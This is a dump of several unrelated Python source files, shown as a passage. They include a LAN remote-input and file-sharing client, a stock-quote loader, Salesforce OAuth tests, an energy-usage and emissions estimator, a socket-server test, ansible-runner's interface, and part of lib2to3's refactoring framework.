    """Clear the terminal screen on both Windows and POSIX systems."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
# In[ ]:
def sendfile(file, ClientIP):
    """Stream *file* to ClientIP:PORT over TCP in 1 KiB chunks.

    The socket and the file handle are managed with ``with`` so both are
    closed even if the transfer fails part-way (the original code leaked
    them on error).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((ClientIP, PORT))
        with open(file, "rb") as f:
            part = f.read(1024)
            while part:
                s.sendall(part)
                part = f.read(1024)
    cls()
    print(file.split("/")[-1], "has been sent!")
# In[ ]:
def receivefile(file):
    """Accept TCP connections forever, saving each upload as file+<count>.

    Each accepted connection is written to a new numbered file until the
    peer closes its end of the stream.
    """
    count = 1
    # Context managers guarantee the listener, each connection and each
    # output file are closed even on error; the original code leaked them
    # on exceptions and its trailing s.close() was unreachable.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((IP, PORT))
        s.listen()
        while True:
            conn, addr = s.accept()
            with conn, open(file + str(count), 'wb') as f:
                while True:
                    bytepart = conn.recv(1024)
                    if not bytepart:
                        break
                    f.write(bytepart)
                f.flush()
            count += 1
            print("\nA file has been received")
# In[ ]:
def selectFile():
    """Open a native file-picker dialog; return the chosen path ('' if cancelled)."""
    dialog_root = Tk()
    dialog_root.withdraw()  # hide the empty Tk main window behind the dialog
    return filedialog.askopenfilename()
# In[ ]:
def broadcast():
    """Announce this client on the LAN as 'IP|hostname|width,height' via UDP broadcast."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('', 0))
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    message = "{}|{}|{},{}".format(IP, HOSTNAME, RES[0], RES[1])
    sock.sendto(message.encode(), ('<broadcast>', PORT))
    sock.close()
# In[ ]:
# Simple text menu: broadcast presence on the LAN, start listening for the
# server, or quit.
while True:
    try:
        print("[0] Broadcast")
        print("[1] Start Listening")
        print("[2] Quit")
        sel = int(input("Make selection: "))
        if sel == 0:
            cls()
            broadcast()
        elif sel == 1:
            cls()
            break
        elif sel == 2:
            cls()
            sys.exit()
    except (ValueError, TypeError):
        # Non-numeric input: clear the screen and show the menu again.
        cls()
        continue
# In[ ]:
def recvInput():
    """Receive the server handshake, then replay remote mouse/keyboard events.

    Datagram protocol (comma-separated fields):
      3 fields  -> mouse move: "<op>,x,y"
      4 fields  -> mouse press/release: "P|R,button,x,y"
      otherwise -> key press/release: "P|R,keycode"
    """
    # Create the socket before the try block so the cleanup below can
    # always reference it (previously a failure in socket() would have hit
    # an unbound name in the handler).
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.bind((IP, PORT))
        # First datagram is the handshake; remember the server's address.
        data, addr = s.recvfrom(20)
        global SERVERIP
        SERVERIP = addr[0]
        pygame.init()
        # Borderless window (duplicate set_mode call removed); iconified
        # immediately so it stays out of the user's way.
        screen = pygame.display.set_mode((1920, 1080), pygame.NOFRAME)
        pygame.display.set_icon(pygame.image.load('assets/icon.png'))
        pygame.display.iconify()
        while True:
            data, addr = s.recvfrom(20)
            fields = data.decode().split(",")
            if len(fields) == 3:
                pygame.mouse.set_pos(int(fields[1]), int(fields[2]))
            elif len(fields) == 4:
                if fields[0] == "P":
                    PyMouse().press(int(fields[1]), int(fields[2]), int(fields[3]))
                else:
                    PyMouse().release(int(fields[1]), int(fields[2]), int(fields[3]))
            else:
                if fields[0] == "P":
                    PyKeyboard().press_key(int(fields[1]))
                else:
                    PyKeyboard().release_key(int(fields[1]))
    except Exception:
        # Was a bare ``except:``, which also swallowed SystemExit and
        # KeyboardInterrupt; any error simply ends the input loop.
        pass
    finally:
        s.close()
        pygame.quit()
# In[ ]:
# Background threads: one replays remote input events, one accepts incoming
# file transfers.
recvThread = threading.Thread(name="recvInput", target=recvInput)
recvThread.start()
recvFile = threading.Thread(name="receivefile", target=receivefile,args=("receivedFile",))
recvFile.start()
# In[ ]:
# Main loop: let the user pick a file and send it to the server.
while True:
    input("Press Enter to Share File")
    path = selectFile()
    if not path == '':
        sendfile(path, SERVERIP)
|
test3.py | import easyquotation
from util import mysqlUtil
from time import strftime, localtime
quotation = easyquotation.use('sina')  # data source: Sina ('sina'); Tencent uses 'tencent'/'qq'
# Fetch realtime quote data for a batch of stock codes and persist it.
def get_real_and_save(stockCodeList):
    """Fetch realtime quotes for *stockCodeList* and insert each tick into MySQL."""
    stockRealInfoList = quotation.get_stock_data(stockCodeList)
    # Insert every quote into the DB; keys are stock codes, values are quote dicts.
    for stockRealInfo in stockRealInfoList:
        v = stockRealInfoList[stockRealInfo]
        mysqlUtil.insertTickData(stockRealInfo, None, v['buy'], v['sell'], v['now'], v['open'], v['close'],
                                 v['high'], v['low'], v['turnover'], v['volume'], v['ask1'], v['ask1_volume'], v['ask2'],
                                 v['ask2_volume'], v['ask3'], v['ask3_volume'], v['ask4'], v['ask4_volume'], v['ask5'],
                                 v['ask5_volume'], v['bid1'], v['bid1_volume'], v['bid2'], v['bid2_volume'], v['bid3'],
                                 v['bid3_volume'], v['bid4'], v['bid4_volume'], v['bid5'], v['bid5_volume'], v['date'],
                                 v['time'], None)
# Split a list into fixed-size chunks
def list_split(items, n):
    """Split *items* into consecutive chunks of at most *n* elements."""
    chunks = []
    for start in range(0, len(items), n):
        chunks.append(items[start:start + n])
    return chunks
# quotation.market_snapshot(prefix=True)  # prefix=True makes returned keys carry the sz/sh prefix
print('mysql耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
stockCodeInfo = mysqlUtil.getStockList()
# for stockInfo in stockList:
#     print(stockInfo[0])
#     stockInfo = quotation.real(stockInfo[0])  # supports explicit prefixes such as 'sh000001'
# stockCodeList = []
#
# for stockInfo in stockList:
#     stockCodeList.append(str(stockInfo))
#
# stockCodeList = ['sz000001','sz000002','sz000004','sz000005','sz000006']
print('代码拼接处理耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
# Build exchange-prefixed codes (e.g. 'sz000001') for the first batch.
# NOTE(review): the loop breaks when i == 1000 *before* appending, so only
# 999 codes are collected -- confirm whether 1000 was intended.
i = 0
stockCodeList = []
for stockCode in stockCodeInfo:
    i = i+1
    if i==1000:
        break
    stockCodeList.append(easyquotation.helpers.get_stock_type(stockCode[0]) + stockCode[0])
# stockPartList = list_split(stockCodeList, 7000)
# for stockPart in stockPartList:
#     t = threading.Thread(target=get_real_and_save, args=(stockPart,))
#     t.start()
#
#
# print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
# stockCodeList = ['000001','000002','000004','000005','000006']
# stock_list = quotation.gen_stock_list(stockCodeList)
stockRealInfoList = quotation.get_stock_data(stockCodeList)
print(stockRealInfoList)
# Insert the data into the DB (kept for reference):
# for stockRealInfo in stockRealInfoList:
#     v = stockRealInfoList[stockRealInfo]
#     mysqlUtil.insertTickData(stockRealInfo,None,v['buy'],v['sell'],v['now'],v['open'],v['close'],
#                              v['high'],v['low'],v['turnover'],v['volume'],v['ask1'],v['ask1_volume'],v['ask2'],
#                              v['ask2_volume'],v['ask3'],v['ask3_volume'],v['ask4'],v['ask4_volume'],v['ask5'],
#                              v['ask5_volume'],v['bid1'],v['bid1_volume'],v['bid2'],v['bid2_volume'],v['bid3'],
#                              v['bid3_volume'],v['bid4'],v['bid4_volume'],v['bid5'],v['bid5_volume'],v['date'],
#                              v['time'],None)
#
# print(stockRealInfo)
# print('请求数据耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
# stockInfo = quotation.real('000006')  # supports explicit prefixes such as 'sh000001'
# print(stockInfo)
test_salesforce.py | import http.client
import threading
import time
import unittest
import urllib.error
import urllib.parse
import urllib.request
from unittest import mock
import responses
from cumulusci.oauth.salesforce import SalesforceOAuth2
from cumulusci.oauth.salesforce import CaptureSalesforceOAuth
class TestSalesforceOAuth(unittest.TestCase):
    """Tests for the low-level SalesforceOAuth2 REST wrapper."""

    def _create_oauth(self):
        return SalesforceOAuth2(
            client_id="foo_id",
            client_secret="foo_secret",
            callback_url="http://localhost:8080",
        )

    @responses.activate
    def test_refresh_token(self):
        # Canned token-endpoint response; the wrapper must return it verbatim.
        responses.add(
            responses.POST,
            "https://login.salesforce.com/services/oauth2/token",
            body=b"SENTINEL",
        )

        resp = self._create_oauth().refresh_token("token")

        self.assertEqual(resp.text, "SENTINEL")

    @responses.activate
    def test_revoke_token(self):
        # The revoke endpoint answers 200 OK; the wrapper surfaces the status.
        responses.add(
            responses.POST,
            "https://login.salesforce.com/services/oauth2/revoke",
            status=http.client.OK,
        )

        resp = self._create_oauth().revoke_token("token")

        self.assertEqual(200, resp.status_code)
@mock.patch("webbrowser.open", mock.MagicMock(return_value=None))
class TestCaptureSalesforceOAuth(unittest.TestCase):
    """Tests for the CaptureSalesforceOAuth browser-callback flow.

    The three tests previously duplicated the mock setup and the busy-wait
    for the local httpd; that boilerplate now lives in helpers so each test
    states only what differs.
    """

    def setUp(self):
        self.client_id = "foo_id"
        self.client_secret = "foo_secret"
        self.callback_url = "http://localhost:8080"
        self.scope = "refresh_token web full"
        self.auth_site = "https://login.salesforce.com"

    def _create_oauth(self):
        return CaptureSalesforceOAuth(
            self.client_id,
            self.client_secret,
            self.callback_url,
            self.auth_site,
            self.scope,
        )

    def _expected_token_response(self):
        """Canned JSON body returned by the mocked token endpoint."""
        return {
            "access_token": "abc123",
            "id_token": "abc123",
            "token_type": "Bearer",
            "signature": "abc123",
            "issued_at": "12345",
            "scope": "{}".format(self.scope),
            "instance_url": "https://na15.salesforce.com",
            "id": "https://login.salesforce.com/id/abc/xyz",
            "refresh_token": "abc123",
        }

    def _mock_authorize_url(self):
        # CaptureSalesforceOAuth validates the authorize URL with a GET
        # before opening the browser.
        responses.add(
            responses.GET,
            "https://login.salesforce.com/services/oauth2/authorize",
            status=http.client.OK,
        )

    def _start_flow(self):
        """Run the OAuth object on a background thread.

        Returns (thread, oauth) once the local callback httpd is listening.
        """
        o = self._create_oauth()
        t = threading.Thread(target=o.__call__)
        t.start()
        while not o.httpd:
            print("waiting for o.httpd")
            time.sleep(0.01)
        return t, o

    @responses.activate
    def test_oauth_flow(self):
        self._mock_authorize_url()
        expected_response = self._expected_token_response()
        responses.add(
            responses.POST,
            "https://login.salesforce.com/services/oauth2/token",
            status=http.client.OK,
            json=expected_response,
        )
        t, o = self._start_flow()

        # Simulate the browser hitting the local callback with an auth code.
        response = urllib.request.urlopen(self.callback_url + "?code=123")

        t.join()
        self.assertEqual(o.response.json(), expected_response)
        self.assertEqual(response.read(), b"OK")

    @responses.activate
    def test_oauth_flow_error_from_auth(self):
        self._mock_authorize_url()
        responses.add(
            responses.POST,
            "https://login.salesforce.com/services/oauth2/token",
            status=http.client.OK,
            json=self._expected_token_response(),
        )
        t, o = self._start_flow()

        # An error callback from the browser surfaces as an HTTP error
        # from the local server.
        with self.assertRaises(urllib.error.HTTPError):
            urllib.request.urlopen(
                self.callback_url + "?error=123&error_description=broken"
            )
        t.join()

    @responses.activate
    def test_oauth_flow_error_from_token(self):
        self._mock_authorize_url()
        # Token endpoint rejects the code; the flow must propagate failure.
        responses.add(
            responses.POST,
            "https://login.salesforce.com/services/oauth2/token",
            status=http.client.FORBIDDEN,
        )
        t, o = self._start_flow()

        with self.assertRaises(urllib.error.HTTPError):
            urllib.request.urlopen(self.callback_url + "?code=123")
        t.join()
|
evaluate.py | import time
import statistics
from timeit import default_timer as timer
from multiprocessing import Process, Queue
import os
import datetime
import subprocess
import queue
import energyusage.utils as utils
import energyusage.convert as convert
import energyusage.locate as locate
import energyusage.report as report
DELAY = .1 # in seconds
def func(user_func, q, *args):
    """ Runs the user's function and puts return value in queue """
    q.put(user_func(*args))
def energy(user_func, *args, powerLoss = 0.8, printToScreen):
    """ Evaluates the kwh needed for your code to run

    Measures a ~5 s idle baseline first, then samples CPU (RAPL files) and,
    when available, Nvidia GPU power while *user_func* runs in a child
    process.

    Parameters:
        user_func (function): user's function
        args: positional arguments forwarded to user_func
        powerLoss (float): PSU efficiency used to scale readings
        printToScreen (bool): keyword-only (no default); console output toggle
    Returns:
        (process_kwh, return_value, watt_averages, files, total_time)
    """
    baseline_check_seconds = 5
    files, multiple_cpus = utils.get_files()
    is_nvidia_gpu = utils.valid_gpu()
    is_valid_cpu = utils.valid_cpu()

    # GPU handling if Nvidia; the seed 0 keeps [-1] valid before any sample.
    gpu_baseline =[0]
    gpu_process = [0]
    bash_command = "nvidia-smi -i 0 --format=csv,noheader --query-gpu=power.draw"

    # ---- Baseline measurement (user code not yet running) ----
    for i in range(int(baseline_check_seconds / DELAY)):
        if is_nvidia_gpu:
            output = subprocess.check_output(['bash','-c', bash_command])
            # Strip the trailing " W" unit from nvidia-smi's output.
            output = float(output.decode("utf-8")[:-2])
            gpu_baseline.append(output)
        if is_valid_cpu:
            files = utils.measure_files(files, DELAY)
            files = utils.update_files(files)
        else:
            time.sleep(DELAY)
        # Adds the most recent value of GPU; 0 if not Nvidia
        last_reading = utils.get_total(files, multiple_cpus) + gpu_baseline[-1]
        if last_reading >=0:
            utils.log("Baseline wattage", last_reading)

    if printToScreen:
        utils.newline()

    # ---- Running the process and measuring wattage ----
    q = Queue()
    p = Process(target = func, args = (user_func, q, *args,))
    start = timer()
    p.start()
    small_delay_counter = 0
    return_value = None
    while(p.is_alive()):
        # Checking at a faster rate for quick processes.
        # NOTE(review): small_delay_counter starts at 0 and is only
        # incremented inside the branch it guards, so this condition is
        # never true and delay always stays DELAY -- confirm the intended
        # fast-poll behaviour.
        if (small_delay_counter > DELAY):
            delay = DELAY / 10
            small_delay_counter+=1
        else:
            delay = DELAY

        if is_nvidia_gpu:
            output = subprocess.check_output(['bash','-c', bash_command])
            output = float(output.decode("utf-8")[:-2])
            gpu_process.append(output)

        if is_valid_cpu:
            files = utils.measure_files(files, delay)
            files = utils.update_files(files, True)
        else:
            time.sleep(delay)

        # Just output, not added
        last_reading = (utils.get_total(files, multiple_cpus) + gpu_process[-1]) / powerLoss
        if last_reading >=0:
            utils.log("Process wattage", last_reading)

        # Getting the return value of the user's function
        try:
            return_value = q.get_nowait()
            break
        except queue.Empty:
            pass

    p.join()
    end = timer()

    # Trim the first and last (partial) samples from each file's series.
    for file in files:
        file.process = file.process[1:-1]
        file.baseline = file.baseline[1:-1]

    if is_nvidia_gpu:
        gpu_baseline_average = statistics.mean(gpu_baseline[2:-1])
        gpu_process_average = statistics.mean(gpu_process[2:-1])
    else:
        gpu_baseline_average = 0
        gpu_process_average = 0

    total_time = end-start # seconds
    # Formatting the time nicely
    timedelta = str(datetime.timedelta(seconds=total_time)).split('.')[0]

    files = utils.average_files(files)

    process_average = utils.get_process_average(files, multiple_cpus, gpu_process_average)
    baseline_average = utils.get_baseline_average(files, multiple_cpus, gpu_baseline_average)
    difference_average = process_average - baseline_average
    watt_averages = [baseline_average, process_average, difference_average]

    # Subtracting baseline wattage to get more accurate result
    process_kwh = convert.to_kwh((process_average - baseline_average)*total_time) / powerLoss

    if is_nvidia_gpu:
        # NOTE(review): ``file`` here is the leftover loop variable from the
        # trimming loop above, not a class/constructor -- calling it will
        # almost certainly fail at runtime, and ``gpu_file`` is discarded.
        # Confirm what was intended before relying on the GPU path.
        gpu_file = file("GPU", "")
        gpu_file.create_gpu(gpu_baseline_average, gpu_process_average)
        files.append(file("GPU", ""))

    # Logging
    utils.log("Final Readings", baseline_average, process_average, difference_average, timedelta)

    return (process_kwh, return_value, watt_averages, files, total_time)
def energy_mix(location, location_of_default):
    """ Gets the energy mix information for a specific location

    Parameters:
        location (str): user's location
        location_of_default (str): which regional average to use when the
            location cannot be determined

    Returns:
        breakdown (list): percentages [coal, oil/petroleum, gas, low-carbon]
    """
    # Resolve "Unknown" to the configured fallback region.
    fallback = {"USAverage": "United States", "EuropeAverage": "Europe"}
    if location == "Unknown":
        location = fallback.get(location_of_default, "World")

    if locate.in_US(location):
        # U.S. data is already expressed as percentages per state.
        state = utils.get_data("data/json/energy-mix-us.json")[location]['mix']
        low_carbon = (state['nuclear'] + state['hydro'] + state['biomass'] +
                      state['wind'] + state['solar'] + state['geothermal'])
        return [state['coal'], state['oil'], state['gas'], low_carbon]

    # International data is absolute; convert to percentages of the total.
    country = utils.get_data('data/json/energy-mix-intl.json')[location]
    total = country['total']
    raw = [country['coal'], country['petroleum'],
           country['naturalGas'], country['lowCarbon']]
    return [100 * value / total for value in raw]
def emissions(process_kwh, breakdown, location, location_of_default):
    """ Calculates the CO2 emitted by the program based on the location

    Parameters:
        process_kwh (int): kWhs used by the process
        breakdown (list): energy mix corresponding to user's location
        location (str): location of user

    Returns:
        emission (float): kilograms of CO2 emitted
        state_emission (float): lbs CO2 per MWh (non-zero only for U.S.)
    """
    if process_kwh < 0:
        raise OSError("Process wattage lower than baseline wattage. Do not run other processes"
                      " during the evaluation, or try evaluating a more resource-intensive process.")

    utils.log("Energy Data", breakdown, location, location_of_default)
    state_emission = 0

    # Unknown locations default to the U.S. national average; both cases
    # use the per-state U.S. table (lbs CO2 per MWh).
    if locate.in_US(location):
        if location == "Unknown":
            location = "United States"
        state_emission = utils.get_data("data/json/us-emissions.json")[location]
        emission = convert.lbs_to_kgs(state_emission * convert.to_MWh(process_kwh))
    else:
        # International: sum the carbon contribution of each fuel type
        # (low-carbon sources contribute nothing).
        coal, petroleum, natural_gas, _low_carbon = breakdown
        emission = (convert.coal_to_carbon(process_kwh * coal / 100)
                    + convert.petroleum_to_carbon(process_kwh * petroleum / 100)
                    + convert.natural_gas_to_carbon(process_kwh * natural_gas / 100))

    utils.log("Emissions", emission)
    return (emission, state_emission)
def emissions_comparison(process_kwh):
    """ Calculates emissions in different locations

    Builds (location, kg CO2) lists for the world, Europe and the U.S.,
    then logs the max / median / min of each group.
    """
    intl_data = utils.get_data("data/json/energy-mix-intl.json")
    global_emissions, europe_emissions, us_emissions = [], [], []

    # International: convert each country's absolute fuel mix to
    # percentages, then to kg CO2 for this process's kWh.
    for country in intl_data:
        c = intl_data[country]
        total, breakdown = c['total'], [c['coal'], c['petroleum'], \
            c['naturalGas'], c['lowCarbon']]
        # Skip entries with missing/zero totals (non-float markers in the data).
        if isinstance(total, float) and float(total) > 0:
            breakdown = list(map(lambda x: 100*x/total, breakdown))
            coal, petroleum, natural_gas, low_carbon = breakdown
            breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
                convert.petroleum_to_carbon(process_kwh * petroleum/100),
                convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
            emission = sum(breakdown)
            if locate.in_Europe(country):
                europe_emissions.append((country,emission))
            else:
                global_emissions.append((country,emission))

    global_emissions.sort(key=lambda x: x[1])
    europe_emissions.sort(key=lambda x: x[1])

    # U.S.: per-state factors are lbs CO2 per MWh.
    us_data = utils.get_data("data/json/us-emissions.json")
    for state in us_data:
        if (state != "United States" and state != "_units"):
            emission = convert.lbs_to_kgs(us_data[state]*convert.to_MWh(process_kwh))
            us_emissions.append((state, emission))
    us_emissions.sort(key=lambda x: x[1])

    # Lists are sorted ascending, so the ends and middle give min/median/max.
    max_global, max_europe, max_us = global_emissions[len(global_emissions)-1], \
        europe_emissions[len(europe_emissions)-1], us_emissions[len(us_emissions)-1]
    median_global, median_europe, median_us = global_emissions[len(global_emissions)//2], \
        europe_emissions[len(europe_emissions)//2], us_emissions[len(us_emissions)//2]
    min_global, min_europe, min_us= global_emissions[0], europe_emissions[0], us_emissions[0]

    utils.log('Emissions Comparison', max_global, median_global, min_global, max_europe, \
        median_europe, min_europe, max_us, median_us, min_us)
def evaluate(user_func, *args, pdf=False, powerLoss=0.8, energyOutput=False, \
    location_of_default = "GlobalAverage", printToScreen = True):
    """ Calculates effective emissions of the function

    Parameters:
        user_func: user-provided function
        pdf (bool): whether a PDF report should be generated
        powerLoss (float): PSU efficiency rating
        energyOutput (bool): when True, also return timing and kWh
        location_of_default (str): regional average used when the user's
            location cannot be determined
        printToScreen (bool): console output toggle

    Returns:
        user_func's return value; or (total_time, kwh, return_value) when
        energyOutput is True; None when the platform is unsupported.
    """
    utils.setGlobal(printToScreen)
    # Measurement requires a RAPL-capable CPU and/or an Nvidia GPU.
    if (utils.valid_cpu() or utils.valid_gpu()):
        location = locate.get(printToScreen)
        result, return_value, watt_averages, files, total_time = energy(user_func, *args, powerLoss=powerLoss, \
            printToScreen = printToScreen)
        breakdown = energy_mix(location, location_of_default)
        emission, state_emission = emissions(result, breakdown, location, location_of_default)
        utils.log("Assumed Carbon Equivalencies")
        emissions_comparison(result)
        utils.log("Process Energy", result)
        if pdf:
            report.generate(location, watt_averages, breakdown, emission, state_emission)
        if energyOutput:
            return (total_time, result, return_value)
        else:
            return return_value
    else:
        utils.log("The energy-usage package only works on Linux kernels "
            "with Intel processors that support the RAPL interface and/or machines with"
            " an Nvidia GPU. Please try again on a different machine.")
|
test.py | #!/bin/env python3
import esockets
import threading
import socket
import time
import logging
import sys
from time import sleep
import maxthreads
# Route DEBUG-and-above records from every logger to stdout with timestamps.
root = logging.getLogger()
root.setLevel(logging.DEBUG)

ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
class Client:
    """A TCP client connected to the given server's listening address."""

    def __init__(self, server):
        # SO_REUSEADDR lets many short-lived test clients reuse local ports.
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.connect((server.host, server.port))
def handle_incoming(client, address):
    # Accept every incoming connection unconditionally.
    return True
def handle_readable(client):
    """Read from *client*; return False (drop connection) on EOF, True otherwise."""
    data = client.recv(1028)
    print(threading.active_count())
    # An empty read means the peer closed its end of the connection.
    return data != b''
# Start the server under test, then open 200 client connections against it.
server = esockets.SocketServer(handle_incoming=handle_incoming,
                               handle_readable=handle_readable,
                               max_subthreads=100)
server.start()

clients = []
send_threads = maxthreads.MaxThreads(100)  # bounds concurrent sender threads
for i in range(200):
    clients.append(Client(server))

def send_from_all(msg):
    # Fan *msg* out from every connected client via the bounded thread pool.
    for i in clients:
        send_threads.start_thread(target=i.sock.sendall,
                                  args=(msg.encode(),))
# sockets = []
#
# def connect(lock, n):
# for i in range(n):
# conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# conn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# conn.connect((server.host, server.port))
# sockets.append(conn)
#
# lock.release()
#
#
# def send():
# for s in sockets:
# s.sendall(b'Hello from client!')
#
# def mass_send():
# while True:
# send()
#
# def sample(seconds, no_samples):
# samples = []
# time1 = time.time()
# while time.time() - time1 < seconds:
# t1 = time.time()
# samples.append(threading.active_count())
# t2 = time.time() - t1
# sleep(seconds/no_samples - t2)
# return samples
#
# conn_lock = threading.Lock()
# conn_lock.acquire()
# threading.Thread(target=connect, args=(conn_lock, 4000)).start()
# conn_lock.acquire()
# threading.Thread(target=mass_send).start()
#
# print('Sampling')
# samples = sample(5, 2000)
# plt.plot(samples)
# plt.show()
|
interface.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.utils import dump_artifacts
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
    '''
    Initialize the Runner() instance

    This function will properly initialize both run() and run_async()
    functions in the same way and return a value instance of Runner.

    See parameters given to :py:func:`ansible_runner.interface.run`
    '''
    dump_artifacts(kwargs)
    output.configure()

    # Pop wrapper-only options so RunnerConfig never sees them.
    debug = kwargs.pop('debug', None)
    if debug in (True, False):
        output.set_debug('enable' if debug is True else 'disable')

    logfile = kwargs.pop('logfile', None)
    if logfile:
        output.set_logfile(logfile)

    runner_config = RunnerConfig(**kwargs)
    runner_config.prepare()
    return Runner(runner_config)
def run(**kwargs):
    '''
    Run an Ansible Runner task in the foreground and return a Runner object when complete.

    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
                             module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
                  the artifact directory holding the results of the invocation.
    :param json_mode: Store event data in place of stdout on the console and in the stdout file
    :param playbook: The playbook (either supplied here as a list or string... or as a path relative to
                     ``private_data_dir/project``) that will be invoked by runner when executing Ansible.
    :param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
                      a specific host or list of hosts. This can take the form of
                        - Path to the inventory file in the ``private_data_dir``
                        - Native python dict supporting the YAML/json inventory structure
                        - A text INI formatted string
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
                    read from ``env/envvars`` in ``private_data_dir``
    :param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
                      read from ``env/extravars`` in ``private_data_dir``.
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
                      Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
                     be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
    :param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
    :param verbosity: Control how verbose the output of ansible-playbook is
    :param quiet: Disable all output
    :param artifact_dir: The path to the directory where artifacts should live

    :type private_data_dir: str
    :type ident: str
    :type json_mode: bool
    :type playbook: str or filename or list
    :type inventory: str or dict or list
    :type envvars: dict
    :type extravars: dict
    :type passwords: dict
    :type settings: dict
    :type ssh_key: str
    :type artifact_dir: str
    :type cmdline: str
    :type quiet: bool
    :type verbosity: int

    :returns: A :py:class:`ansible_runner.runner.Runner` object
    '''
    r = init_runner(**kwargs)
    r.run()
    return r
def run_async(**kwargs):
    '''
    Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.

    This uses the same parameters as :py:func:`ansible_runner.interface.run`

    :returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
    '''
    runner = init_runner(**kwargs)
    runner_thread = threading.Thread(target=runner.run)
    runner_thread.start()
    return runner_thread, runner
|
refactor.py | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
    """Return the names of all fixer modules found in package *fixer_pkg*.

    Only modules whose names start with "fix_" are considered; with
    remove_prefix (the default) that prefix is stripped from each name.
    Names are returned in the order pkgutil discovers them.
    """
    pkg = __import__(fixer_pkg, [], [], ["*"])
    prefix_len = 4 if remove_prefix else 0
    return [name[prefix_len:]
            for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__)
            if name.startswith("fix_")]
class _EveryNode(Exception):
    # Internal signal: a pattern may match any node type, so the fixer
    # must be registered under every head-node type.
    pass
def _get_head_types(pat):
    """ Accepts a pytree Pattern Node and returns a set
    of the pattern types which will match first. """

    if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatters must either have no type and no content
        # or a type and content -- so they don't get any farther
        # Always return leafs
        if pat.type is None:
            # Typeless pattern: could match anything.
            raise _EveryNode
        return {pat.type}

    if isinstance(pat, pytree.NegatedPattern):
        if pat.content:
            return _get_head_types(pat.content)
        raise _EveryNode # Negated Patterns don't have a type

    if isinstance(pat, pytree.WildcardPattern):
        # Recurse on each node in content and union the results.
        r = set()
        for p in pat.content:
            for x in p:
                r.update(_get_head_types(x))
        return r

    raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
    """ Accepts a list of fixers and returns a dictionary
    of head node type --> fixer list. """
    head_nodes = collections.defaultdict(list)
    every = []  # fixers that must be offered every node type
    for fixer in fixer_list:
        if not fixer.pattern:
            # No compiled pattern: fall back to the fixer's declared accept
            # type, or treat it as matching everything.
            if fixer._accept_type is None:
                every.append(fixer)
            else:
                head_nodes[fixer._accept_type].append(fixer)
            continue
        try:
            heads = _get_head_types(fixer.pattern)
        except _EveryNode:
            every.append(fixer)
        else:
            for node_type in heads:
                head_nodes[node_type].append(fixer)
    # Fixers that match anything are appended under every known symbol and
    # token type of the grammar.
    for node_type in chain(pygram.python_grammar.symbol2number.values(),
                           pygram.python_grammar.tokens):
        head_nodes[node_type].extend(every)
    return dict(head_nodes)
def get_fixers_from_package(pkg_name):
    """
    Return the fully qualified names for fixers in the package pkg_name.
    """
    # Keep the "fix_" prefix so the result is a valid module path.
    module_names = get_all_fix_names(pkg_name, False)
    return ["%s.%s" % (pkg_name, name) for name in module_names]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
